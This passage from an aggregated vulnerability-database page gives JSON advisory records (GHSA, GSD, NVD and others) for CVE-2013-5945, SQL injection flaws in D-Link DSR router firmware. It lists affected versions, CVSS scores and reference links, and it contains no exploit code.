        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "ident": null
      },
      {
        "db": "BID",
        "id": "64172",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "124319",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2013-12-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "ident": null
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "64172",
        "ident": null
      },
      {
        "date": "2020-02-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "ident": null
      },
      {
        "date": "2013-12-07T17:10:52",
        "db": "PACKETSTORM",
        "id": "124319",
        "ident": null
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "ident": null
      },
      {
        "date": "2020-02-11T12:15:11.757000",
        "db": "NVD",
        "id": "CVE-2013-5945",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2013-12-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "ident": null
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "64172",
        "ident": null
      },
      {
        "date": "2020-02-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "ident": null
      },
      {
        "date": "2021-04-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "ident": null
      },
      {
        "date": "2024-11-21T01:58:28.210000",
        "db": "NVD",
        "id": "CVE-2013-5945",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "plural  D-Link In the product  SQL Injection vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ],
    "trust": 0.6
  }
}

ghsa-h4fc-4px4-xq89

Vulnerability from github

Published

2022-05-05 00:29

Modified

2022-05-05 00:29

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2013-5945"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-02-11T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua.",
  "id": "GHSA-h4fc-4px4-xq89",
  "modified": "2022-05-05T00:29:35Z",
  "published": "2022-05-05T00:29:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-5945"
    },
    {
      "type": "WEB",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
    },
    {
      "type": "WEB",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
    },
    {
      "type": "WEB",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
    },
    {
      "type": "WEB",
      "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
    },
    {
      "type": "WEB",
      "url": "http://www.exploit-db.com/exploits/30061"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

gsd-2013-5945

Vulnerability from gsd

Modified

2023-12-13 01:22

Details

Aliases

CVE-2013-5945

Aliases

CVE-2013-5945

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2013-5945",
    "description": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua.",
    "id": "GSD-2013-5945",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2013-5945"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2013-5945"
      ],
      "details": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua.",
      "id": "GSD-2013-5945",
      "modified": "2023-12-13T01:22:22.102306Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2013-5945",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf",
            "refsource": "MISC",
            "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
          },
          {
            "name": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf",
            "refsource": "MISC",
            "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
          },
          {
            "name": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf",
            "refsource": "MISC",
            "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
          },
          {
            "name": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf",
            "refsource": "MISC",
            "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
          },
          {
            "name": "http://www.exploit-db.com/exploits/30061",
            "refsource": "MISC",
            "url": "http://www.exploit-db.com/exploits/30061"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b44",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.05b64",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b44",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b44",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b77",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b77",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b77",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b77",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-5945"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-89"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.exploit-db.com/exploits/30061",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.exploit-db.com/exploits/30061"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf",
              "refsource": "MISC",
              "tags": [
                "Broken Link"
              ],
              "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf",
              "refsource": "MISC",
              "tags": [
                "Broken Link"
              ],
              "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf",
              "refsource": "MISC",
              "tags": [
                "Broken Link"
              ],
              "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf",
              "refsource": "MISC",
              "tags": [
                "Broken Link"
              ],
              "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2021-04-23T18:13Z",
      "publishedDate": "2020-02-11T12:15Z"
    }
  }
}

fkie_cve-2013-5945

Vulnerability from fkie_nvd

Published

2020-02-11 12:15

Modified

2024-11-21 01:58

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
cve@mitre.org	http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf	Broken Link
cve@mitre.org	http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf	Broken Link
cve@mitre.org	http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf	Broken Link
cve@mitre.org	http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf	Broken Link
cve@mitre.org	http://www.exploit-db.com/exploits/30061	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://www.exploit-db.com/exploits/30061	Exploit, Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
dlink	dsr-150_firmware	*
dlink	dsr-150	-
dlink	dsr-150n_firmware	*
dlink	dsr-150n	-
dlink	dsr-250_firmware	*
dlink	dsr-250	-
dlink	dsr-250n_firmware	*
dlink	dsr-250n	-
dlink	dsr-500_firmware	*
dlink	dsr-500	-
dlink	dsr-500n_firmware	*
dlink	dsr-500n	-
dlink	dsr-1000_firmware	*
dlink	dsr-1000	-
dlink	dsr-1000n_firmware	*
dlink	dsr-1000n	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BD73A85-9D52-4389-A555-D6FDB737AE59",
              "versionEndExcluding": "1.08b44",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6953E43-A7B5-4F35-BF7D-CE75FB2FA96D",
              "versionEndExcluding": "1.05b64",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "51C91D3D-52F0-405F-B652-45DFC3C0C673",
              "versionEndExcluding": "1.08b44",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6763ED3-B6F2-4BC4-88DC-DDF383A40761",
              "versionEndExcluding": "1.08b44",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E80E081B-1FB5-4B37-A054-7F6D3A507B47",
              "versionEndExcluding": "1.08b77",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C49E10FB-39AA-4193-8EFE-815EE72ADA6E",
              "versionEndExcluding": "1.08b77",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C7AF3E-A7B6-47D6-A3DD-26E28398843B",
              "versionEndExcluding": "1.08b77",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F33EBB05-D58C-47C0-9EB7-D0F03C027169",
              "versionEndExcluding": "1.08b77",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de inyecci\u00f3n SQL en dispositivos D-Link DSR-150 con versi\u00f3n de firmware anterior a 1.08B44; DSR-150N con versiones de firmware anteriores a 1.05B64; DSR-250 y DSR-250N con versiones de firmware anteriores a 1.08B44; y DSR-500, DSR-500N, DSR-1000 y DSR-1000N con versiones de firmware anteriores a 1.08B77, permiten a atacantes remotos ejecutar comandos SQL arbitrarios por medio de la contrase\u00f1a para (1) la funci\u00f3n login.authenticate en los archivos share/lua/5.1/teamf1lualib/login.lua o (2) cautivePortal.lua."
    }
  ],
  "id": "CVE-2013-5945",
  "lastModified": "2024-11-21T01:58:28.210",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-02-11T12:15:11.757",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.exploit-db.com/exploits/30061"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.exploit-db.com/exploits/30061"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
